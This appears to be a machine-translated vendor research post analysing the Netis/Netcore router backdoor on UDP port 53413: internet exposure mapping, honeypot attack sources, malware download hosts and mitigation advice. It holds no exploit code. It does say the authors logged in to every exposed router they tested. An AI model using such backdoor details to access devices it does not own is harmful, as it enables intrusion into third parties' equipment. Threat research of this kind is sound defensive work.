analysis on the utilization of the back door of leike router

Posted by tetley at 2020-03-14

Leike router backdoor was discovered by security researchers of trend technology [1] in 2014, when the number of exposures given was more than 2 million. Today, five years later, our threat capture system can still capture the exploitation of this vulnerability every day. Therefore, we will analyze its exposure and vulnerability utilization in this paper.

The back door port of Leike router is 53413, which provides UDP service to the outside world. The back door uses hard coded password. Therefore, when the device in question is exposed on the Internet, the attacker can easily log in and execute arbitrary code on the device.

In order to know how many vulnerable devices still exist in the world, we have mapped the exposed Leike routers with back doors on the Internet.

Unless otherwise specified, the data mentioned in this section are global single round mapping data (August 2019).

The country with the most exposure of Leike router with back door is China, with the number close to 3000, while other countries have relatively less exposure.

According to the mapping data, the number of exposure of Leike router with back door is much less than that of the equipment when the back door was found in 2014 (2 million to 3000). Although China's exposure accounts for 89% of the total, in terms of actual exposure, it is not much. The reason for the relatively large number of exposure in China is that we suspect that Leike is a Chinese manufacturer and the market is mainly domestic. The data given in Leike router scanning project [2] is 1028 (scanned on October 18, 2019). It is speculated that the difference in the number of exposures may be related to the geographic location of the scanning IP. We have not studied the specific reasons for the difference.

At the same time, we also verify its login and find that all routers can login successfully. As for whether the command can be executed after the login is successful, we have not verified it.

Figure 2.1 national distribution of Netcore router with back door

In this section, we will use the data captured by the green alliance threat capture system to illustrate the current threat situation related to the back door of Leike router. The data is from the log data from March 21, 2019 to October 30, 2019. Next, we will analyze the logs captured by honeypot from three dimensions: attack source, attack event and sample.

1 attack source analysis

After the source IP in the honeypot log is de duplicated, it is found that there are 348 independent IPS connected to the honeypot, 229 of which are used for the back door. In terms of the national distribution of IP used for back door, the United States has the most IP, accounting for 51%.

Figure 3.1 national distribution of log source IP of honeypot at back door of Leike router

2 attack event analysis

We have analyzed the attack events in the log data of honeypot at the back door of Leike router. Here we regard the log of an independent IP as an event in a day, and we will present the number of events in days. As can be seen from the figure, except for the relatively small number of events in the initial deployment period, the number of daily events and backdoor utilization events did not fluctuate too much.

Figure 3.2 event distribution of honeypot capture at the back door of Leike router

3 sample analysis

Furthermore, we analyze the sample download address and C & C. After de duplication, we get 31 valid sample download addresses and 29 C & C. Through the correlation analysis of sample download address and C & C, it is found that the absolute majority of sample download address and C & C are the same. Therefore, only the country distribution of the sample download address is analyzed below. It can be seen from the figure that the United States and the Netherlands account for the largest proportion, which is also consistent with the national distribution of IP used for back door.

Note: the sample data is from September and October 2019.

Figure 3.3 country distribution of sample download address captured by honeypot at back door of Leike router

Through the analysis of the sample download script, we found that it generally supports a variety of architectures. In the example we give, the sample of the attack group supports 12 architectures, including MIPs, arm, x86, PowerPC, etc. Moreover, the sample download script does not distinguish what the architecture of the broken device is, but downloads and tries to run.

Figure 3.4 example of sample download script captured by honeypot at back door of Leike router

Compared with five years ago, the risk of backdoor utilization faced by Leike routers has been greatly reduced. Currently, the number of Leike routers with backdoors is less than 3000. Although the number of exposures is small, attackers are still exploiting them.

For such cases, our suggestions are as follows:

As a user: you can consider upgrading the firmware of the device or purchasing a new device to replace the device that has been used for many years.

As a regulator: it can promote the governance of similar loopholes.

As a device manufacturer: provide OTA upgrade mechanism to ensure that when new products have vulnerabilities, the vulnerabilities can be fixed in a more convenient way in a timely manner.


[1].Netis Routers Leave Wide Open Backdoor,

Gewu laboratory focuses on the security research of three business scenarios of industrial Internet, Internet of things and Internet of vehicles. It is committed to Scenario Oriented, intelligent device centered vulnerability mining, research and security analysis, and focuses on IOT asset, vulnerability and threat analysis. At present, many research reports have been published, including white paper on Internet of things security, annual report on Internet of things security 2017, annual report on Internet of things security 2018, analysis on exposure of domestic Internet of things assets, smart device security analysis manual, etc. Jointly launch the green alliance IOT security risk control platform with the product team to locate the risk management and control of IOT network card in the operator industry; launch the firmware security detection platform to quickly discover the possible vulnerabilities in the equipment, so as to avoid the leakage of the control authority of the equipment due to weak password, overflow and other vulnerabilities.

Past review

Similarities and differences between vessel safety and EDR

Analysis of 5g security (2): 5g security requirements

Practical operation of safety assessment of Beifu PLC

[recruitment] recruitment announcement of interns of Lvmeng science and Technology Innovation Center (long term effective)

The original article of the official account only represents the author's viewpoint and does not represent the position of the Green League. All original content copyright belongs to green alliance technology research communication. Without authorization, no media, WeChat official account is allowed to be copied, reproduced, excerpts or otherwise used. The reprint should be marked from the Green Alliance Technology Research Newsletter and attached to the link.

About us

Lvmeng technology research communication is operated by Lvmeng technology innovation center, which is the leading technology research department of Lvmeng technology. It includes Cloud Security Lab, security big data analysis lab and Internet of things Security Lab. The team members are composed of doctors and masters from Tsinghua University, Peking University, Harbin Institute of technology, Chinese Academy of Sciences, Beijing post and other key universities.

As one of the important training units of "post doctoral workstation sub station of Haidian Park of Zhongguancun Science and Technology Park", Lvmeng science and technology innovation center has carried out post doctoral joint training with Tsinghua University. The scientific research achievements have covered all kinds of national projects, national patents, national standards, high-level academic papers, professional books, etc.

We continue to explore the cutting-edge academic direction in the field of information security, starting from practice, combining the company's resources and advanced technology, to realize the concept level prototype system, and then deliver product line incubation products and create huge economic value.

Long press the QR code above to follow us